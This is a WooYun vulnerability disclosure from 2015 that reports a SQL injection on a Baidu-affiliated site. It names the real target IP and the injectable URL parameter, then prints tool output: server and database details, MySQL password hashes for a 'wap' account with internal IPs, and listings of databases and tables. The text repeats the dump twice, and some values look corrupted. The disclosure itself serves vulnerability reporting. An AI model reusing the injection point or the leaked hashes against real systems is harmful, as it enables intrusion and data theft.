百度旗下某业务子站SQL注入漏洞

发表于 2015年07月09日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0125580

漏洞标题：百度旗下某业务子站SQL注入漏洞

漏洞详情

披露状态：

2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-09: 厂商已经确认，细节仅向厂商公开
2015-07-19: 细节向核心白帽子及相关领域专家公开
2015-07-29: 细节向普通白帽子公开
2015-08-08: 细节向实习白帽子公开
2015-08-23: 细节向公众公开

简要描述：

一天小姨子来我家，刚好家里买了点香蕉，便问她要不要，小姨子说，不用不用。我：给你吃的，不是给你用的！顿时家里安静了...

详细说明：

http://42.62.39.206/wap/ph2?mo=&cm=M3140060&site=0&psortid=1%27路径

Target: http://42.62.39.206/wap/ph2?mo=&cm=M3140060&site=0&psortid=1<br>
Host IP:		42.62.39.206<br>Web Server: Apache<br>Powered-by: PHP/5.2.6<br>DB Server: MySQL time based<br>
Resp. Time(avg):	275 ms<br>Current User: [email protected]<br>Sql Version: 5.1.73-log<br>Current DB: baikan<br>System User: [email protected]<br>Host Name: localhost.localdomain<br>Installation dir: /usr/local/mysql/<br>DB User & Pass: root::localhost<br>
		root::localhost.localdomain<br>
		root::127.0.0.1<br>
		::localhost<br>
		::localhost.localdomain<br>
		wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.165<br>
		wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.166<br>
		wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.167<br>
		wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.168<br>
		wap:*47F5587D14973816A255AB6698096D0D1DDBE6AD:118.144.95.169<br>
		wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:localhost<br>
		wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.152<br>
		wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:11.11.0.128<br>
		wap:*47F5587D14973816A2C4AB6698096D0D1DDBE6AD:11.11.0.129<br>
		wap:*47F5587D14973816A2C4AB6698096D0D1DDBE6AD:1/.11.0.130<br>
		wap:*47F5587D14973816A2C5AB6698096D0D1DDBA6AD:11.11.0.131<br>
		wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:11.11.0.132<br>Data Bases: information_schema<br>
		baikan<br>
		mysql<br>
		test

Target: http://42.62.39.206/wap/ph2?mo=&cm=M3140060&site=0&psortid=1

Host IP: 42.62.39.206 Web Server: Apache Powered-by: PHP/5.2.6 DB Server: MySQL time based

Resp. Time(avg): 275 ms Current User: [email protected] Sql Version: 5.1.73-log Current DB: baikan System User: [email protected] Host Name: localhost.localdomain Installation dir: /usr/local/mysql/ DB User & Pass: root::localhost

root::localhost.localdomain

root::127.0.0.1

::localhost

::localhost.localdomain

wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.165

wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.166

wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.167

wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.168

wap:*47F5587D14973816A255AB6698096D0D1DDBE6AD:118.144.95.169

wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:localhost

wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.152

wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:11.11.0.128

wap:*47F5587D14973816A2C4AB6698096D0D1DDBE6AD:11.11.0.129

wap:*47F5587D14973816A2C4AB6698096D0D1DDBE6AD:1/.11.0.130

wap:*47F5587D14973816A2C5AB6698096D0D1DDBA6AD:11.11.0.131

wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:11.11.0.132 Data Bases: information_schema

baikan

mysql

test

Database: test<br>
[1 table]<br>
+---------------------------------------+<br>
| te                                    |<br>
+---------------------------------------+Database: baikan<br>
[21 tables]<br>
+---------------------------------------+<br>
| admin_user                            |<br>
| baikan_psort                          |<br>
| baikan_saomiao_block_log              |<br>
| baikan_saomiao_keyword_log            |<br>
| baikan_sort                           |<br>
| channel_bookorder_duoku               |<br>
| channel_bookorder_duokubak            |<br>
| cmread_book_info                      |<br>
| global_level                          |<br>
| wap_advertisement                     |<br>
| wap_advertposition                    |<br>
| wap_block                             |<br>
| wap_blockbooks                        |<br>
| wap_blockchildren                     |<br>
| wap_cooperater                        |<br>
| wap_cpbooks                           |<br>
| wap_feedback                          |<br>
| wap_keyword                           |<br>
| wap_keywordposition                   |<br>
| wap_page                              |<br>
| wap_page_block                        |<br>
+---------------------------------------+Database: information_schema<br>
[28 tables]<br>
+---------------------------------------+<br>
| CHARACTER_SETS                        |<br>
| COLLATIONS                            |<br>
| COLLATION_CHARACTER_SET_APPLICABILITY |<br>
| COLUMNS                               |<br>
| COLUMN_PRIVILEGES                     |<br>
| ENGINES                               |<br>
| EVENTS                                |<br>
| FILES                                 |<br>
| GLOBAL_STATUS                         |<br>
| GLOBAL_VARIABLES                      |<br>
| KEY_COLUMN_USAGE                      |<br>
| PARTITIONS                            |<br>
| PLUGINS                               |<br>
| PROCESSLIST                           |<br>
| PROFILING                             |<br>
| REFERENTIAL_CONSTRAINTS               |<br>
| ROUTINES                              |<br>
| SCHEMATA                              |<br>
| SCHEMA_PRIVILEGES                     |<br>
| SESSION_STATUS                        |<br>
| SESSION_VARIABLES                     |<br>
| STATISTICS                            |<br>
| TABLES                                |<br>
| TABLE_CONSTRAINTS                     |<br>
| TABLE_PRIVILEGES                      |<br>
| TRIGGERS                              |<br>
| USER_PRIVILEGES                       |<br>
| VIEWS                                 |<br>
+---------------------------------------+Database: mysql<br>
[23 tables]<br>
+---------------------------------------+<br>
| user                                  |<br>
| columns_priv                          |<br>
| db                                    |<br>
| event                                 |<br>
| func                                  |<br>
| general_log                           |<br>
| help_category                         |<br>
| help_keyword                          |<br>
| help_relation                         |<br>
| help_topic                            |<br>
| host                                  |<br>
| ndb_binlog_index                      |<br>
| plugin                                |<br>
| proc                                  |<br>
| procs_priv                            |<br>
| servers                               |<br>
| slow_log                              |<br>
| tables_priv                           |<br>
| time_zone                             |<br>
| time_zone_leap_second                 |<br>
| time_zone_name                        |<br>
| time_zone_transition                  |<br>
| time_zone_transition_type             |<br>
+---------------------------------------+

Database: test

[1 table]

+---------------------------------------+

| te |

+---------------------------------------+Database: baikan

[21 tables]

+---------------------------------------+

| admin_user |

| baikan_psort |

| baikan_saomiao_block_log |

| baikan_saomiao_keyword_log |

| baikan_sort |

| channel_bookorder_duoku |

| channel_bookorder_duokubak |

| cmread_book_info |

| global_level |

| wap_advertisement |

| wap_advertposition |

| wap_block |

| wap_blockbooks |

| wap_blockchildren |

| wap_cooperater |

| wap_cpbooks |

| wap_feedback |

| wap_keyword |

| wap_keywordposition |

| wap_page |

| wap_page_block |

+---------------------------------------+Database: information_schema

[28 tables]

+---------------------------------------+

| CHARACTER_SETS |

| COLLATIONS |

| COLLATION_CHARACTER_SET_APPLICABILITY |

| COLUMNS |

| COLUMN_PRIVILEGES |

| ENGINES |

| EVENTS |

| FILES |

| GLOBAL_STATUS |

| GLOBAL_VARIABLES |

| KEY_COLUMN_USAGE |

| PARTITIONS |

| PLUGINS |

| PROCESSLIST |

| PROFILING |

| REFERENTIAL_CONSTRAINTS |

| ROUTINES |

| SCHEMATA |

| SCHEMA_PRIVILEGES |

| SESSION_STATUS |

| SESSION_VARIABLES |

| STATISTICS |

| TABLES |

| TABLE_CONSTRAINTS |

| TABLE_PRIVILEGES |

| TRIGGERS |

| USER_PRIVILEGES |

| VIEWS |

+---------------------------------------+Database: mysql

[23 tables]

+---------------------------------------+

| user |

| columns_priv |

| db |

| event |

| func |

| general_log |

| help_category |

| help_keyword |

| help_relation |

| help_topic |

| host |

| ndb_binlog_index |

| plugin |

| proc |

| procs_priv |

| servers |

| slow_log |

| tables_priv |

| time_zone |

| time_zone_leap_second |

| time_zone_name |

| time_zone_transition |

| time_zone_transition_type |

+---------------------------------------+

漏洞证明：

修复方案：

过滤

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-07-0914:19

厂商回复：

感谢

评价

2010-01-01 00:00 ＆小小黑白帽子 | Rank:10 漏洞数:1)

0.0

原文连接：百度旗下某业务子站SQL注入漏洞 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

百度旗下某业务子站SQL注入漏洞

漏洞概要

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

漏洞回应

厂商回应：

厂商回复：

最新状态：

评价